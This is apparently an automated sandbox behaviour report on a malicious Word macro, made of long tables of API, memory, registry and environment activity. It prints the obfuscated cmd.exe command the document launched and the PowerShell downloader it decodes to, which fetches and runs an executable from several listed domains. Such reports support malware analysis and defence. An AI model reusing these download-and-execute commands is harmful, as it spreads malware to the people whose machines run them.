| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x771834a3 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x7717c34e |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x7717c204 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x77373dcf |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x77378e70 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x77377684 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7737cc98 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x773a903a |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x77376231 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x77375fea |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x77383f94 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x77384e9e |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x773adb72 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x77392a8c |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x773ad737 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x773ae015 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x773acc3d |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x773ad1c4 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x773ad48c |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x773ad4c6 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x773ad509 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7737e7bb |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7737e496 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7737ddf1 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x773ad53f |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x773b2055 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x773b20ea |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x773b2151 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x773b21f5 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x773b2288 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x773b2335 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x773b23d5 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x77385934 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x77385a98 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x773859b4 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x773de405 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x773def07 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x773df00a |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x773def47 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x773df15e |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x773ddbd4 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x773decfa |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x773dea66 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x773dd332 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x773dee2e |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x773dca11 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x773dcc5f |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x773dcde7 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x773dc802 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x773dec66 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x773dd155 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7737b0dc |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x77395f3e |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x77384fd0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x77380d2c |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x773959ed |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7736f8b8 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x77549d4e |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x77510782 |
|
1 | |
| Get Address | Unknown module name | function = 597, address_out = 0x6e720dd8 |
|
3 | |
| Get Address | Unknown module name | function = 600, address_out = 0x6e602b76 |
|
3 | |
| Get Address | Unknown module name | function = 575, address_out = 0x6e5d8d52 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x6e5d8aa8 |
|
3 | |
| Get Address | Unknown module name | function = 614, address_out = 0x6e721b68 |
|
3 | |
| Get Address | Unknown module name | function = 695, address_out = 0x6e5d9060 |
|
3 | |
| Get Address | Unknown module name | function = 714, address_out = 0x6e721eb2 |
|
3 | |
| Get Address | Unknown module name | function = 587, address_out = 0x6e7216aa |
|
3 | |
| Get Address | Unknown module name | function = 573, address_out = 0x6e5d9327 |
|
3 | |
| Get Address | Unknown module name | function = 585, address_out = 0x6e7210ab |
|
3 | |
| Get Address | Unknown module name | function = 582, address_out = 0x6e721b3d |
|
3 | |
| Get Address | Unknown module name | function = 583, address_out = 0x6e7212b8 |
|
3 | |
| Get Address | Unknown module name | function = 698, address_out = 0x6e5d8468 |
|
3 | |
| Get Address | Unknown module name | function = 584, address_out = 0x6e721bf4 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (21)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 473, y_out = 836 |
|
1 | |
| Get Time | type = Ticks, time = 110339 |
|
1 | |
| Get Time | type = Ticks, time = 114676 |
|
1 | |
| Get Time | type = Local Time, time = 2018-08-01 04:17:53 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2018-08-01 04:17:54 (Local Time) |
|
11 | |
| Get Time | type = Local Time, time = 2018-08-01 04:17:55 (Local Time) |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
2986
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /V/C"set pPr=MOANtGXcfYQDJZlJqsHzDVpR-8Ix'$iS{@+vC2o=/(WFbjdh);gekUnaru}P7:E, wy0.\m&&for %D in (22;38;65;51;56;17;47;51;14;14;64;29;55;21;21;39;54;51;65;24;38;44;45;51;7;4;64;3;51;4;68;42;51;44;36;14;30;51;54;4;49;29;15;62;17;39;28;47;4;4;22;61;40;40;35;46;4;38;50;4;68;54;14;40;55;70;66;10;33;47;4;4;22;61;40;40;35;30;7;30;38;57;17;51;54;4;51;56;22;56;30;17;51;17;68;7;38;70;40;16;6;53;57;6;16;33;47;4;4;22;61;40;40;57;54;7;14;51;44;57;46;17;22;30;7;51;68;7;38;70;40;25;67;46;33;47;4;4;22;61;40;40;35;55;14;30;57;54;55;17;68;7;38;70;40;5;25;36;38;38;26;33;47;4;4;22;61;40;40;4;47;51;17;30;14;35;51;56;55;70;51;56;30;7;55;54;51;55;50;14;51;68;7;38;70;40;4;44;28;68;31;22;14;30;4;41;28;33;28;48;49;29;42;6;62;64;39;64;28;60;37;60;28;49;29;23;42;30;39;29;51;54;35;61;4;51;70;22;34;28;69;28;34;29;42;6;62;34;28;68;51;27;51;28;49;8;38;56;51;55;7;47;41;29;54;16;13;64;30;54;64;29;15;62;17;48;32;4;56;66;32;29;55;21;21;68;20;38;65;54;14;38;55;46;43;30;14;51;41;29;54;16;13;63;64;29;23;42;30;48;49;31;4;55;56;4;24;59;56;38;7;51;17;17;64;29;23;42;30;49;44;56;51;55;52;49;58;7;55;4;7;47;32;58;58;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;80)do set Zv=!Zv!!pPr:~%D,1!&&if %D==80 call %Zv:~-362%" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:00, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa34 |
| Parent PID | 0x9a4 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x002c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x01372fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x4a9d0000 | 0x4aa1bfff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x74120000 | 0x74126fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (2877)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
590 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1692 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
118 | |
| Write | STD_OUTPUT_HANDLE | size = 33 |
|
59 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
118 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
51 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
118 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
51 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
59 | |
| Write | STD_OUTPUT_HANDLE | size = 19 |
|
8 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
8 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a9d0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77760000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x777b24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7779ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x777a3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777b2732 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-08-01 10:17:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 117250 |
|
1 |
Environment (80)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = D in (22;38;65;51;56;17;47;51;14;14;64;29;55;21;21;39;54;51;65;24;38;44;45;51;7;4;64;3;51;4;68;42;51;44;36;14;30;51;54;4;49;29;15;62;17;39;28;47;4;4;22;61;40;40;35;46;4;38;50;4;68;54;14;40;55;70;66;10;33;47;4;4;22;61;40;40;35;30;7;30;38;57;17;51;54;4;51;56;22;56;30;17;51;17;68;7;38;70;40;16;6;53;57;6;16;33;47;4;4;22;61;40;40;57;54;7;14;51;44;57;46;17;22;30;7;51;68;7;38;70;40;25;67;46;33;47;4;4;22;61;40;40;35;55;14;30;57;54;55;17;68;7;38;70;40;5;25;36;38;38;26;33;47;4;4;22;61;40;40;4;47;51;17;30;14;35;51;56;55;70;51;56;30;7;55;54;51;55;50;14;51;68;7;38;70;40;4;44;28;68;31;22;14;30;4;41;28;33;28;48;49;29;42;6;62;64;39;64;28;60;37;60;28;49;29;23;42;30;39;29;51;54;35;61;4;51;70;22;34;28;69;28;34;29;42;6;62;34;28;68;51;27;51;28;49;8;38;56;51;55;7;47;41;29;54;16;13;64;30;54;64;29;15;62;17;48;32;4;56;66;32;29;55;21;21;68;20;38;65;54;14;38;55;46;43;30;14;51;41;29;54;16;13;63;64;29;23;42;30;48;49;31;4;55;56;4;24;59;56;38;7;51;17;17;64;29;23;42;30;49;44;56;51;55;52;49;58;7;55;4;7;47;32;58;58;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;80)do set Zv=!Zv!!pPr |
|
1 | |
| Get Environment String | name = D,1!&&if |
|
1 | |
| Get Environment String | name = D==80 call |
|
1 | |
| Get Environment String | name = Zv |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
59 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: powershell.exe
442
25
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell $aVV=new-object Net.WebClient;$JEs='http://vdtogt.nl/amyQ@http://viciousenterprises.com/qXUuXq@http://unclebudspice.com/80d@http://valiunas.com/G8CooI@http://thesilveramericaneagle.com/tb'.Split('@');$WXE = '727';$RWi=$env:temp+'\'+$WXE+'.exe';foreach($nqZ in $JEs){try{$aVV.DownloadFile($nqZ, $RWi);Start-Process $RWi;break;}catch{}} |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:03, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa54 |
| Parent PID | 0xa34 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A58
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A6C
0x
A70
0x
AE8
0x
AF0
0x
AF4
0x
BCC
0x
BE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000f0000 | 0x000f2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00257fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00271fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00280000 | 0x00283fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00290000 | 0x002affff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x002c0000 | 0x002c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x004d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x010dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000010e0000 | 0x010e0000 | 0x011befff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x011c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x011d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011f0000 | 0x011f0000 | 0x012effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000012f0000 | 0x012f0000 | 0x012f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x0133ffff | Private Memory | rwx |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x01340000 | 0x0136ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01370000 | 0x013d5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013e0000 | 0x013e0000 | 0x0141ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001420000 | 0x01420000 | 0x0142ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001430000 | 0x01430000 | 0x0143ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x0144ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x0145ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001460000 | 0x01460000 | 0x0146ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x014affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014b0000 | 0x014b0000 | 0x014bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000014c0000 | 0x014c0000 | 0x014fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001500000 | 0x01500000 | 0x0150ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001510000 | 0x01510000 | 0x0154ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01550000 | 0x0181efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001820000 | 0x01820000 | 0x01c12fff | Pagefile Backed Memory | r |
|
|
|
- |
| l_intl.nls | 0x01c20000 | 0x01c22fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01c30fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01c40000 | 0x01c44fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01c50000 | 0x01c57fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x01c60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01cbffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x01cc0000 | 0x01d00fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01d20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d3ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e6ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x01e80000 | 0x01f3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f4ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x01f8ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001f90000 | 0x01f90000 | 0x03f8ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x03f90000 | 0x04271fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x04280000 | 0x042c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorrc.dll | 0x042d0000 | 0x04323fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004330000 | 0x04330000 | 0x0433ffff | Private Memory | - |
|
